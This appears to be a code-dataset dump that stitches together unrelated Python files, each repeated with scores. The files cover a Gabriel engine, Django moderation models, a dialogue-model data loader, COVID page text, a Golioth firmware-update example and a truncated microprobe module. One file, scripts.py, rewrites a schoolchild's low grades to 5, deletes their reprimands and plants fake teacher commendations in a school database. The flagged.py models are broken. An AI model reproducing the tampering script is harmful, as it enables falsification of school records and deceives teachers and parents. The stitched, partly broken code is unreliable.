while True:
to_engine = gabriel_pb2.ToEngine()
to_engine.ParseFromString(input_queue.get())
result_wrapper = engine.handle(to_engine.from_client)
from_engine = cognitive_engine.pack_from_engine(
to_engine.host, to_engine.port, result_wrapper)
_write_message(write, from_engine.SerializeToString())
finally:
os.close(write)
def _write_message(fd, serialized_message):
'''Write serialized protobuf message to file descriptor fd.
The size of the bytestring is written. Then the bytestring itself is
written.'''
size_of_message = len(serialized_message)
size_bytes = size_of_message.to_bytes(_NUM_BYTES_FOR_SIZE, _BYTEORDER)
num_bytes_written = os.write(fd, size_bytes)
assert num_bytes_written == _NUM_BYTES_FOR_SIZE, 'Write incomplete'
num_bytes_written = os.write(fd, serialized_message)
assert num_bytes_written == size_of_message, 'Write incomplete' | src/gabriel_server/local_engine.py | import asyncio
import logging
import multiprocessing
import os
import queue
from gabriel_protocol import gabriel_pb2
from gabriel_server import cognitive_engine
from gabriel_server.websocket_server import WebsocketServer
_NUM_BYTES_FOR_SIZE = 4
_BYTEORDER = 'big'
logger = logging.getLogger(__name__)
def run(engine_factory, filter_name, input_queue_maxsize, port, num_tokens):
try:
input_queue = multiprocessing.Queue(input_queue_maxsize)
read, write = os.pipe()
local_server = _LocalServer(port, num_tokens, input_queue, read)
local_server.add_filter_consumed(filter_name)
engine_process = multiprocessing.Process(
target=_run_engine, args=(engine_factory, input_queue, read, write))
engine_process.start()
os.close(write)
local_server.launch()
finally:
local_server.cleanup()
os.close(read)
raise Exception('Server stopped')
class _LocalServer(WebsocketServer):
def __init__(self, port, num_tokens_per_filter, input_queue, read):
super().__init__(port, num_tokens_per_filter)
self._input_queue = input_queue
loop = asyncio.get_event_loop()
self._stream_reader = asyncio.StreamReader(loop=loop)
def protocol_factory():
return asyncio.StreamReaderProtocol(self._stream_reader)
pipe = os.fdopen(read, mode='r')
self._transport, _ = loop.run_until_complete(
loop.connect_read_pipe(protocol_factory, pipe))
def cleanup(self):
self._transport.close()
async def _send_to_engine(self, to_engine):
try:
# I did not check self._input_queue full() because the docs say that
# multiprocessing.Queue().full() is not reliable.
self._input_queue.put_nowait(to_engine.SerializeToString())
except queue.Full:
return False
return True
async def _recv_from_engine(self):
'''Read serialized protobuf message.
The size of the bytestring is read. Then the bytestring itself is
read.'''
size_bytes = await self._stream_reader.readexactly(_NUM_BYTES_FOR_SIZE)
size_of_message = int.from_bytes(size_bytes, _BYTEORDER)
from_engine_serialized = await self._stream_reader.readexactly(
size_of_message)
from_engine = gabriel_pb2.FromEngine()
from_engine.ParseFromString(from_engine_serialized)
return from_engine
def _run_engine(engine_factory, input_queue, read, write):
try:
os.close(read)
engine = engine_factory()
logger.info('Cognitive engine started')
while True:
to_engine = gabriel_pb2.ToEngine()
to_engine.ParseFromString(input_queue.get())
result_wrapper = engine.handle(to_engine.from_client)
from_engine = cognitive_engine.pack_from_engine(
to_engine.host, to_engine.port, result_wrapper)
_write_message(write, from_engine.SerializeToString())
finally:
os.close(write)
def _write_message(fd, serialized_message):
'''Write serialized protobuf message to file descriptor fd.
The size of the bytestring is written. Then the bytestring itself is
written.'''
size_of_message = len(serialized_message)
size_bytes = size_of_message.to_bytes(_NUM_BYTES_FOR_SIZE, _BYTEORDER)
num_bytes_written = os.write(fd, size_bytes)
assert num_bytes_written == _NUM_BYTES_FOR_SIZE, 'Write incomplete'
num_bytes_written = os.write(fd, serialized_message)
assert num_bytes_written == size_of_message, 'Write incomplete' | 0.390941 | 0.080647 |
from django.db import models
from .models import UserProfile, Comment
class Flagged(models.Model):
flagged_by = models.ForeignKey(UserProfile)
# offensive, violent/threat, against the rules, bullying
reason_description = models.CharField()
flag_count = models.IntegerField()
flagged_to_comment = models.ForeignKey(FlaggedComment)
flagged_to_user = models.ForeignKey(FlaggedUser)
flagged_to_question = models.ForeignKey(FlaggedQuestion)
@classmethod
def add_flag(cls):
# FORMULA : Total Comments
cls.flag_count += 1
@classmethod
def remove_flag(cls):
cls.flag_count -= 1
class FlaggedComment(models.Model):
comment_id = models.OneToOneField(Comment)
flagged = models.OneToOneField(Flagged)
class FlaggedUser(models.Model):
is_banned_user = models.BooleanField()
flagged_question = models.ManyToManyField(FlaggedQuestion)
flagged_question_count = models.IntegerField()
@classmethod
def get_flag_count(cls):
pass
class FlaggedQuestion(models.Model):
is_age_restricted = models.BooleanField()
class BlockedUser(models.Model, FlaggedUser):
"""
Ubiq. Language:
Blocker = User that is blocking
Blocked = User blocked
Description:
The Blocker won't see the Blocked details, and
vice versa. This includes not seeing their
comments, or on News Feed.
Blocked users are viewed by Blocker on a list
They can choose to unblock.
"""
user_doing_the_blocking = models.ForeignKey(User)
blocked_user_id = models.CharField()
taking_a_break_from_this_user = models.BooleanField()
@classmethod
def unblock_user(cls):
"""
check the JSON of the Blocker's block list, and see if that id exists in the
JSON currently. If it is, then remove it.
"""
if cls.blocked_user_id is cls.user_doing_the_blocking.blockedlist.blocked_user_id:
# TODO: Then you will remove that id from the JSON.
for user in cls.user_doing_the_blocking.blocked_users_list:
if user == cls.blocked_user_id:
pass | flagged.py | from django.db import models
from .models import UserProfile, Comment
class Flagged(models.Model):
flagged_by = models.ForeignKey(UserProfile)
# offensive, violent/threat, against the rules, bullying
reason_description = models.CharField()
flag_count = models.IntegerField()
flagged_to_comment = models.ForeignKey(FlaggedComment)
flagged_to_user = models.ForeignKey(FlaggedUser)
flagged_to_question = models.ForeignKey(FlaggedQuestion)
@classmethod
def add_flag(cls):
# FORMULA : Total Comments
cls.flag_count += 1
@classmethod
def remove_flag(cls):
cls.flag_count -= 1
class FlaggedComment(models.Model):
comment_id = models.OneToOneField(Comment)
flagged = models.OneToOneField(Flagged)
class FlaggedUser(models.Model):
is_banned_user = models.BooleanField()
flagged_question = models.ManyToManyField(FlaggedQuestion)
flagged_question_count = models.IntegerField()
@classmethod
def get_flag_count(cls):
pass
class FlaggedQuestion(models.Model):
is_age_restricted = models.BooleanField()
class BlockedUser(models.Model, FlaggedUser):
"""
Ubiq. Language:
Blocker = User that is blocking
Blocked = User blocked
Description:
The Blocker won't see the Blocked details, and
vice versa. This includes not seeing their
comments, or on News Feed.
Blocked users are viewed by Blocker on a list
They can choose to unblock.
"""
user_doing_the_blocking = models.ForeignKey(User)
blocked_user_id = models.CharField()
taking_a_break_from_this_user = models.BooleanField()
@classmethod
def unblock_user(cls):
"""
check the JSON of the Blocker's block list, and see if that id exists in the
JSON currently. If it is, then remove it.
"""
if cls.blocked_user_id is cls.user_doing_the_blocking.blockedlist.blocked_user_id:
# TODO: Then you will remove that id from the JSON.
for user in cls.user_doing_the_blocking.blocked_users_list:
if user == cls.blocked_user_id:
pass | 0.418222 | 0.145085 |
import torch
from torch.autograd import Variable
import numpy as np
from collections import defaultdict
from vocab import Vocab
import os
def read_corpus(file_path, pad_bos_eos=False):
data = []
for line in open(file_path):
sent = line.strip().split(' ')
# only append <s> and </s> to the target sentence
if pad_bos_eos:
sent = ['<s>'] + sent + ['</s>']
data.append(sent)
return data
def read_fact(filename):
facts = []
for line in open(filename):
fact = [f.strip().split(' ') for f in line.split(' tabplaceholder ')[0:-1]] # the last fact is empty
facts.append(fact)
return facts # 3D list of facts words
def word2id_2d(sents, vocab): # batch * fact_num * fact_seq_len
word_ids = []
for fact_set in sents:
fact_ids = [[vocab[w] for w in s] for s in fact_set]
word_ids.append(fact_ids)
return word_ids
def word2id(sents, vocab):
if type(sents[0]) == list:
return [[vocab[w] for w in s] for s in sents]
else:
return [vocab[w] for w in sents]
def pad_sentences(sents, pad_token):
max_len = max(len(s) for s in sents)
new_sents, masks = [], []
for s in sents:
masks.append([1] * len(s) + [0] * (max_len - len(s)))
new_sents.append(s + [pad_token] * (max_len - len(s)))
return new_sents, masks
def pad_sentences_2d(sents, pad_token): # batch * fact_num * fact_word_num
max_len = max(max(len(f) for f in facts) for facts in sents)
new_sents, masks = [], []
for fact_set in sents:
new_sent, mask = [], []
for s in fact_set:
mask.append([1] * len(s) + [0] * (max_len - len(s)))
new_sent.append(s + [pad_token] * (max_len - len(s)))
new_sents.append(new_sent)
masks.append(mask)
return new_sents, masks
def to_input_var_2d(sents, vocab, cuda=False): # batch * fact_num * fact_word_num
sents_id = word2id_2d(sents, vocab)
sents_id, masks = pad_sentences_2d(sents_id, vocab.pad_id)
sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
if cuda:
sents_var = sents_var.cuda()
return sents_var
def to_input_var(sents, vocab, cuda=False):
sents_id = word2id(sents, vocab)
sents_id, masks = pad_sentences(sents_id, vocab.pad_id)
sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
if cuda:
sents_var = sents_var.cuda()
return sents_var
class HNCMDataLoader(object):
def __init__(self, args, vocab=None):
self.args = args
self.vocab = vocab
self.load_data()
self.load_vocab()
@staticmethod
def add_args(parser):
return parser
def load_data(self):
args = self.args
def _load(src_file, trg_file, fact_file, delimiter='\t'):
if src_file is not None and trg_file is not None and fact_file is not None:
src_sents = read_corpus(src_file, pad_bos_eos=False)
trg_sents = read_corpus(trg_file, pad_bos_eos=True)
fact_sents = read_fact(fact_file)
else:
src_sents = trg_sents = fact_sents = []
return list(zip(src_sents, trg_sents, fact_sents)) #[src, trg, fact]
self.trn = _load(args.train_src_file, args.train_trg_file, args.train_fact_file, args.delimiter)
self.dev = _load(args.dev_src_file, args.dev_trg_file, args.dev_fact_file, args.delimiter)
self.tst = _load(args.test_src_file, args.test_trg_file, args.test_fact_file, args.delimiter)
def load_vocab(self):
# Load the vocabulary or create vocabulary if not exists
if self.args.vocab is not None:
if not os.path.isfile(self.args.vocab):
print('create new vocab and save to %s' % self.args.vocab)
src_sents, trg_sents, fact_sents = zip(*self.trn)
# when building vocab, treat fact sentences as additional source sentences
# src_fact_sents contains a list of words in both source sentence and fact sentences
src_fact_sents = []
for src, fact in zip(src_sents, fact_sents):
new_fact = src
for f in fact:
new_fact += f
src_fact_sents.append(new_fact)
self.vocab = Vocab(
src_fact_sents, trg_sents, self.args.src_vocab_size,
self.args.trg_vocab_size,
remove_singleton=not self.args.include_singleton,
share_vocab=self.args.share_vocab
)
torch.save(self.vocab, self.args.vocab)
else:
self.vocab = torch.load(self.args.vocab)
else:
print('vocab file is required')
exit(0)
@staticmethod
def batch_slice(data, batch_size, sort=True):
batch_num = int(np.ceil(len(data) / float(batch_size)))
for i in range(batch_num):
cur_batch_size = batch_size if i < batch_num - 1 else len(data) - batch_size * i
src_sents = [data[i * batch_size + b][0] for b in range(cur_batch_size)]
trg_sents = [data[i * batch_size + b][1] for b in range(cur_batch_size)]
fact_sents = [data[i * batch_size + b][2] for b in range(cur_batch_size)]
if sort:
src_ids = sorted(range(cur_batch_size), key=lambda src_id: len(src_sents[src_id]), reverse=True)
src_sents = [src_sents[src_id] for src_id in src_ids]
trg_sents = [trg_sents[src_id] for src_id in src_ids]
fact_sents = [fact_sents[src_id] for src_id in src_ids]
yield src_sents, trg_sents, fact_sents
@staticmethod
def data_iter(data, vocab, batch_size, shuffle=True, cuda=False):
"""
Given data, generate sample for the current batch
randomly permute data, then sort by source length, and partition into batches
ensure that the length of source sentences in each batch is decreasing
"""
buckets = defaultdict(list)
for pair in data:
src_sent = pair[0]
buckets[len(src_sent)].append(pair)
batched_data = []
for src_len in buckets:
tuples = buckets[src_len]
if shuffle: np.random.shuffle(tuples)
batched_data.extend(list(HNCMDataLoader.batch_slice(tuples, batch_size)))
if shuffle:
np.random.shuffle(batched_data)
for src_sents, trg_sents, fact_sents in batched_data:
num_trg_word = sum(len(s[:-1]) for s in trg_sents)
src_lengths = [len(s) for s in src_sents]
src_seqs_var = to_input_var(src_sents, vocab.src, cuda)
trg_seqs_var = to_input_var(trg_sents, vocab.trg, cuda)
fact_lengths = [[len (s) for s in fact_sent] for fact_sent in fact_sents]
fact_seqs_var = to_input_var_2d(fact_sents, vocab.src, cuda)
yield {
'src_seq': src_seqs_var, 'src_lengths': src_lengths,
'fact_seq': fact_seqs_var, 'fact_lengths': fact_lengths,
'trg_seq': trg_seqs_var[:, :-1],
'target': trg_seqs_var[:, 1:],
'num_trg_word': num_trg_word, 'num_trg_seq': len(trg_sents)
} | generation/hncm_dataloader.py | import torch
from torch.autograd import Variable
import numpy as np
from collections import defaultdict
from vocab import Vocab
import os
def read_corpus(file_path, pad_bos_eos=False):
data = []
for line in open(file_path):
sent = line.strip().split(' ')
# only append <s> and </s> to the target sentence
if pad_bos_eos:
sent = ['<s>'] + sent + ['</s>']
data.append(sent)
return data
def read_fact(filename):
facts = []
for line in open(filename):
fact = [f.strip().split(' ') for f in line.split(' tabplaceholder ')[0:-1]] # the last fact is empty
facts.append(fact)
return facts # 3D list of facts words
def word2id_2d(sents, vocab): # batch * fact_num * fact_seq_len
word_ids = []
for fact_set in sents:
fact_ids = [[vocab[w] for w in s] for s in fact_set]
word_ids.append(fact_ids)
return word_ids
def word2id(sents, vocab):
if type(sents[0]) == list:
return [[vocab[w] for w in s] for s in sents]
else:
return [vocab[w] for w in sents]
def pad_sentences(sents, pad_token):
max_len = max(len(s) for s in sents)
new_sents, masks = [], []
for s in sents:
masks.append([1] * len(s) + [0] * (max_len - len(s)))
new_sents.append(s + [pad_token] * (max_len - len(s)))
return new_sents, masks
def pad_sentences_2d(sents, pad_token): # batch * fact_num * fact_word_num
max_len = max(max(len(f) for f in facts) for facts in sents)
new_sents, masks = [], []
for fact_set in sents:
new_sent, mask = [], []
for s in fact_set:
mask.append([1] * len(s) + [0] * (max_len - len(s)))
new_sent.append(s + [pad_token] * (max_len - len(s)))
new_sents.append(new_sent)
masks.append(mask)
return new_sents, masks
def to_input_var_2d(sents, vocab, cuda=False): # batch * fact_num * fact_word_num
sents_id = word2id_2d(sents, vocab)
sents_id, masks = pad_sentences_2d(sents_id, vocab.pad_id)
sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
if cuda:
sents_var = sents_var.cuda()
return sents_var
def to_input_var(sents, vocab, cuda=False):
sents_id = word2id(sents, vocab)
sents_id, masks = pad_sentences(sents_id, vocab.pad_id)
sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
if cuda:
sents_var = sents_var.cuda()
return sents_var
class HNCMDataLoader(object):
def __init__(self, args, vocab=None):
self.args = args
self.vocab = vocab
self.load_data()
self.load_vocab()
@staticmethod
def add_args(parser):
return parser
def load_data(self):
args = self.args
def _load(src_file, trg_file, fact_file, delimiter='\t'):
if src_file is not None and trg_file is not None and fact_file is not None:
src_sents = read_corpus(src_file, pad_bos_eos=False)
trg_sents = read_corpus(trg_file, pad_bos_eos=True)
fact_sents = read_fact(fact_file)
else:
src_sents = trg_sents = fact_sents = []
return list(zip(src_sents, trg_sents, fact_sents)) #[src, trg, fact]
self.trn = _load(args.train_src_file, args.train_trg_file, args.train_fact_file, args.delimiter)
self.dev = _load(args.dev_src_file, args.dev_trg_file, args.dev_fact_file, args.delimiter)
self.tst = _load(args.test_src_file, args.test_trg_file, args.test_fact_file, args.delimiter)
def load_vocab(self):
# Load the vocabulary or create vocabulary if not exists
if self.args.vocab is not None:
if not os.path.isfile(self.args.vocab):
print('create new vocab and save to %s' % self.args.vocab)
src_sents, trg_sents, fact_sents = zip(*self.trn)
# when building vocab, treat fact sentences as additional source sentences
# src_fact_sents contains a list of words in both source sentence and fact sentences
src_fact_sents = []
for src, fact in zip(src_sents, fact_sents):
new_fact = src
for f in fact:
new_fact += f
src_fact_sents.append(new_fact)
self.vocab = Vocab(
src_fact_sents, trg_sents, self.args.src_vocab_size,
self.args.trg_vocab_size,
remove_singleton=not self.args.include_singleton,
share_vocab=self.args.share_vocab
)
torch.save(self.vocab, self.args.vocab)
else:
self.vocab = torch.load(self.args.vocab)
else:
print('vocab file is required')
exit(0)
@staticmethod
def batch_slice(data, batch_size, sort=True):
batch_num = int(np.ceil(len(data) / float(batch_size)))
for i in range(batch_num):
cur_batch_size = batch_size if i < batch_num - 1 else len(data) - batch_size * i
src_sents = [data[i * batch_size + b][0] for b in range(cur_batch_size)]
trg_sents = [data[i * batch_size + b][1] for b in range(cur_batch_size)]
fact_sents = [data[i * batch_size + b][2] for b in range(cur_batch_size)]
if sort:
src_ids = sorted(range(cur_batch_size), key=lambda src_id: len(src_sents[src_id]), reverse=True)
src_sents = [src_sents[src_id] for src_id in src_ids]
trg_sents = [trg_sents[src_id] for src_id in src_ids]
fact_sents = [fact_sents[src_id] for src_id in src_ids]
yield src_sents, trg_sents, fact_sents
@staticmethod
def data_iter(data, vocab, batch_size, shuffle=True, cuda=False):
"""
Given data, generate sample for the current batch
randomly permute data, then sort by source length, and partition into batches
ensure that the length of source sentences in each batch is decreasing
"""
buckets = defaultdict(list)
for pair in data:
src_sent = pair[0]
buckets[len(src_sent)].append(pair)
batched_data = []
for src_len in buckets:
tuples = buckets[src_len]
if shuffle: np.random.shuffle(tuples)
batched_data.extend(list(HNCMDataLoader.batch_slice(tuples, batch_size)))
if shuffle:
np.random.shuffle(batched_data)
for src_sents, trg_sents, fact_sents in batched_data:
num_trg_word = sum(len(s[:-1]) for s in trg_sents)
src_lengths = [len(s) for s in src_sents]
src_seqs_var = to_input_var(src_sents, vocab.src, cuda)
trg_seqs_var = to_input_var(trg_sents, vocab.trg, cuda)
fact_lengths = [[len (s) for s in fact_sent] for fact_sent in fact_sents]
fact_seqs_var = to_input_var_2d(fact_sents, vocab.src, cuda)
yield {
'src_seq': src_seqs_var, 'src_lengths': src_lengths,
'fact_seq': fact_seqs_var, 'fact_lengths': fact_lengths,
'trg_seq': trg_seqs_var[:, :-1],
'target': trg_seqs_var[:, 1:],
'num_trg_word': num_trg_word, 'num_trg_seq': len(trg_sents)
} | 0.490968 | 0.28354 |
import random
from datacenter.models import Chastisement
from datacenter.models import Commendation
from datacenter.models import Lesson
from datacenter.models import Mark
from datacenter.models import Schoolkid
def get_schoolkid_object(child_name):
child = Schoolkid.objects.get(full_name__contains=child_name)
return child
def fix_marks(child_name):
child = get_schoolkid_object(child_name)
Mark.objects.filter(schoolkid=child, points__lt=4).update(points=5)
def remove_chastisements(child_name):
child = get_schoolkid_object(child_name)
Chastisement.objects.filter(schoolkid=child).delete()
def create_commendation(child_name, subject_name):
commendations = [
'Молодец!',
'Отлично!',
'Хорошо!',
'Гораздо лучше, чем я ожидал!',
'Ты меня приятно удивил!',
'Великолепно!',
'Прекрасно!',
'Ты меня очень обрадовал!',
'Именно этого я давно ждал от тебя!',
'Сказано здорово – просто и ясно!',
'Ты, как всегда, точен!',
'Очень хороший ответ!',
'Талантливо!',
'Ты сегодня прыгнул выше головы!',
'Я поражен!',
'Уже существенно лучше!',
'Потрясающе!',
'Замечательно!',
'Прекрасное начало!',
'Так держать!',
'Ты на верном пути!',
'Здорово!',
'Это как раз то, что нужно!',
'Я тобой горжусь!',
'С каждым разом у тебя получается всё лучше!',
'Мы с тобой не зря поработали!',
'Я вижу, как ты стараешься!',
'Ты растешь над собой!',
'Ты многое сделал, я это вижу!',
'Теперь у тебя точно все получится!',
]
child = get_schoolkid_object(child_name)
last_lesson = Lesson.objects.filter(subject__title=subject_name, subject__year_of_study=child.year_of_study).order_by('-date')[0]
Commendation.objects.create(
text=random.choice(commendations),
created=last_lesson.date,
schoolkid=child,
subject=last_lesson.subject,
teacher=last_lesson.teacher
) | scripts.py | import random
from datacenter.models import Chastisement
from datacenter.models import Commendation
from datacenter.models import Lesson
from datacenter.models import Mark
from datacenter.models import Schoolkid
def get_schoolkid_object(child_name):
child = Schoolkid.objects.get(full_name__contains=child_name)
return child
def fix_marks(child_name):
child = get_schoolkid_object(child_name)
Mark.objects.filter(schoolkid=child, points__lt=4).update(points=5)
def remove_chastisements(child_name):
child = get_schoolkid_object(child_name)
Chastisement.objects.filter(schoolkid=child).delete()
def create_commendation(child_name, subject_name):
commendations = [
'Молодец!',
'Отлично!',
'Хорошо!',
'Гораздо лучше, чем я ожидал!',
'Ты меня приятно удивил!',
'Великолепно!',
'Прекрасно!',
'Ты меня очень обрадовал!',
'Именно этого я давно ждал от тебя!',
'Сказано здорово – просто и ясно!',
'Ты, как всегда, точен!',
'Очень хороший ответ!',
'Талантливо!',
'Ты сегодня прыгнул выше головы!',
'Я поражен!',
'Уже существенно лучше!',
'Потрясающе!',
'Замечательно!',
'Прекрасное начало!',
'Так держать!',
'Ты на верном пути!',
'Здорово!',
'Это как раз то, что нужно!',
'Я тобой горжусь!',
'С каждым разом у тебя получается всё лучше!',
'Мы с тобой не зря поработали!',
'Я вижу, как ты стараешься!',
'Ты растешь над собой!',
'Ты многое сделал, я это вижу!',
'Теперь у тебя точно все получится!',
]
child = get_schoolkid_object(child_name)
last_lesson = Lesson.objects.filter(subject__title=subject_name, subject__year_of_study=child.year_of_study).order_by('-date')[0]
Commendation.objects.create(
text=random.choice(commendations),
created=last_lesson.date,
schoolkid=child,
subject=last_lesson.subject,
teacher=last_lesson.teacher
) | 0.241042 | 0.173778 |
class GrowthContent:
introduction = (
"There are many ways to measure the growth of COVID-19 cases and "
"deaths in countries around the world. For example, one could simply "
"measure an increase in the absolute number of cases or deaths in a "
"country over a period of time. Measuring growth in this manner makes "
"comparisons from one country to another difficult as larger "
"countries tend to have a larger number of new cases or deaths. To "
"better allow for comparisons across countries, two measures of "
"growth have been chosen. To calculate a percent increase in the "
"number of cases or deaths, the difference in the cumulative number "
"of cases or deaths between today and last week is divided by the "
"number of cases or deaths from last week. Alternatively, "
"the difference in the cumulative number of cases *per million* "
"between last week and today provides a way to compare countries "
"whose populations vary."
)
case_growth_data = (
"Below is a plot to visualize the growth of COVID-19 cases in either "
"the top or bottom 15 countries. The growth of cases may be "
"visualized either by percent or by an absolute increase in cases per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
death_growth_data = (
"Below is a plot to visualize the growth of COVID-19 deaths in either "
"the top or bottom 15 countries. The growth of deaths may be "
"visualized either by percent or by an absolute increase in deaths per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
growth_content = GrowthContent() | global_covid_tracker/content/growth_content.py | class GrowthContent:
introduction = (
"There are many ways to measure the growth of COVID-19 cases and "
"deaths in countries around the world. For example, one could simply "
"measure an increase in the absolute number of cases or deaths in a "
"country over a period of time. Measuring growth in this manner makes "
"comparisons from one country to another difficult as larger "
"countries tend to have a larger number of new cases or deaths. To "
"better allow for comparisons across countries, two measures of "
"growth have been chosen. To calculate a percent increase in the "
"number of cases or deaths, the difference in the cumulative number "
"of cases or deaths between today and last week is divided by the "
"number of cases or deaths from last week. Alternatively, "
"the difference in the cumulative number of cases *per million* "
"between last week and today provides a way to compare countries "
"whose populations vary."
)
case_growth_data = (
"Below is a plot to visualize the growth of COVID-19 cases in either "
"the top or bottom 15 countries. The growth of cases may be "
"visualized either by percent or by an absolute increase in cases per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
death_growth_data = (
"Below is a plot to visualize the growth of COVID-19 deaths in either "
"the top or bottom 15 countries. The growth of deaths may be "
"visualized either by percent or by an absolute increase in deaths per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
growth_content = GrowthContent() | 0.720172 | 0.969179 |
import os
import ssl
import socketpool
import wifi
import golioth.golioth as Golioth
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
def connected(client):
print("Connected to Golioth!")
client.listen_desired_version()
def disconnected(client):
print("Disconnected from Golioth!")
def on_new_version(client, pkg, version, digest):
print("new version")
print(pkg)
print(version)
print(digest)
found = False
fname = "/artifacts/" + pkg + "-" + version
try:
os.stat(fname)
found = True
except OSError as e:
found = False
if not found:
print("triggering download")
client.download_artifact(pkg, version)
def on_download_artifact(client, pkg, version, payload):
print("file arrived")
print(pkg)
print(version)
try:
if "artifacts" not in os.listdir("/"):
os.mkdir("artifacts")
fname = pkg + "-" + version
with open("/artifacts/" + fname, "w") as fp:
fp.write(payload)
fp.flush()
for f in os.listdir("/artifacts"):
if f.startswith(pkg) and f != fname:
print("removing " + f)
os.remove("/artifacts/" + f)
except OSError as e:
print("error saving artifact")
print(e)
# secrets dictionary must contain 'ssid' and 'password' at a minimum
print("Connecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
print("IP address ", wifi.radio.ipv4_address)
pool = socketpool.SocketPool(wifi.radio)
golioth_client = Golioth.Client(
secrets["psk_id"], secrets["psk"], pool, ssl.create_default_context())
golioth_client.on_connect = connected
golioth_client.on_disconnect = disconnected
golioth_client.on_desired_version_changed = on_new_version
golioth_client.on_download_artifact = on_download_artifact
print("Connecting to Golioth...")
golioth_client.connect()
while True:
try:
golioth_client.loop()
except (ValueError, RuntimeError) as e:
print("Failed to get data, retrying\n", e)
print("Reconnecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
golioth_client.connect()
continue | examples/native_networking/dfu/code.py | import os
import ssl
import socketpool
import wifi
import golioth.golioth as Golioth
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
def connected(client):
print("Connected to Golioth!")
client.listen_desired_version()
def disconnected(client):
print("Disconnected from Golioth!")
def on_new_version(client, pkg, version, digest):
print("new version")
print(pkg)
print(version)
print(digest)
found = False
fname = "/artifacts/" + pkg + "-" + version
try:
os.stat(fname)
found = True
except OSError as e:
found = False
if not found:
print("triggering download")
client.download_artifact(pkg, version)
def on_download_artifact(client, pkg, version, payload):
print("file arrived")
print(pkg)
print(version)
try:
if "artifacts" not in os.listdir("/"):
os.mkdir("artifacts")
fname = pkg + "-" + version
with open("/artifacts/" + fname, "w") as fp:
fp.write(payload)
fp.flush()
for f in os.listdir("/artifacts"):
if f.startswith(pkg) and f != fname:
print("removing " + f)
os.remove("/artifacts/" + f)
except OSError as e:
print("error saving artifact")
print(e)
# secrets dictionary must contain 'ssid' and 'password' at a minimum
print("Connecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
print("IP address ", wifi.radio.ipv4_address)
pool = socketpool.SocketPool(wifi.radio)
golioth_client = Golioth.Client(
secrets["psk_id"], secrets["psk"], pool, ssl.create_default_context())
golioth_client.on_connect = connected
golioth_client.on_disconnect = disconnected
golioth_client.on_desired_version_changed = on_new_version
golioth_client.on_download_artifact = on_download_artifact
print("Connecting to Golioth...")
golioth_client.connect()
while True:
try:
golioth_client.loop()
except (ValueError, RuntimeError) as e:
print("Failed to get data, retrying\n", e)
print("Reconnecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
golioth_client.connect()
continue | 0.114752 | 0.052765 |
# Futures
from __future__ import absolute_import
# Built-in modules
import abc
# Third party modules
import six
# Own modules
from microprobe.exceptions import MicroprobeArchitectureDefinitionError
from microprobe.utils.imp import find_subclasses
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["import_classes_from", "Comparator"]
# Functions
def import_classes_from(modules):
"""
:param modules:
"""
LOG.info("Start")
classes = {}
for module_str in modules:
for cls in find_subclasses(module_str, Comparator):
name = cls.__name__
if name in classes:
raise MicroprobeArchitectureDefinitionError(
"Duplicated "
"definition"
" of Comparator '%s' "
"in module '%s'" % (name, module_str)
)
LOG.info("%s comparator imported", name)
classes[name] = cls
if len(classes) == 0:
LOG.warning("No comparators imported.")
LOG.info("End")
return list(classes.values())
# Classes
class Comparator(six.with_metaclass(abc.ABCMeta, object)):
"""Abstract class to perform comparisons. :class:`~.Comparator`
objects are in charge of performing comparisons between values
while providing an architecture independent and modular interface.
They are registered in an :class:`~.ISA` object using the
:meth:`~.ISA.register_value_comparator`.
Once registered, whenever a comparison is needed to perform a
given operation, it is possible to check (:meth:`check`) if
the :class:`~.Comparator` can perform the requested comparison,
and if so, it can generate (:meth:`generate`) the required
:class:`~.list` of :class:`~.Instruction` to perform it.
:param isa: Architecture to operate on.
"""
def __init__(self, arch):
"""
:param arch:
"""
self._arch = arch
@abc.abstractmethod
def check(self, reg, value):
"""Checks whether the :class:`~.Register` *reg* instance can
be compared with the *value*, which can be a ::class:`~.int` or another
:class:`~.Register`. If is not possible to perform the
comparison, a `None` value is returned. Otherwise, the
:class:`~.Register` instance where the result of the
comparison would be placed is returned.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
"""
raise NotImplementedError
@abc.abstractmethod
def generate(self, reg, value, helper_instr):
"""Generate the :class:`~.Instruction` to perform
the comparison. If the required instruction is found within
the :class:`~.list` of :class:`~.Instruction`
*helper_instr*, no new instruction is generated and the matching
instruction operands are set accordingly.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
:param helper_instr: List of helper instructions.
:type helper_instr: :class:`~.list` of :class`~.Instruction`
instances.
"""
raise NotImplementedError
@abc.abstractproperty
def instr_name(self):
"""Value comparator name, usually the opcode of the instruction it
uses (:class:`~.str`).
"""
raise NotImplementedError
@property
def arch(self):
"""Architecture on this :class:`~.Comparator` will work on
(:class:`~.ISA`).
"""
return self._arch | src/microprobe/target/isa/comparator.py | # Futures
from __future__ import absolute_import
# Built-in modules
import abc
# Third party modules
import six
# Own modules
from microprobe.exceptions import MicroprobeArchitectureDefinitionError
from microprobe.utils.imp import find_subclasses
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["import_classes_from", "Comparator"]
# Functions
def import_classes_from(modules):
"""
:param modules:
"""
LOG.info("Start")
classes = {}
for module_str in modules:
for cls in find_subclasses(module_str, Comparator):
name = cls.__name__
if name in classes:
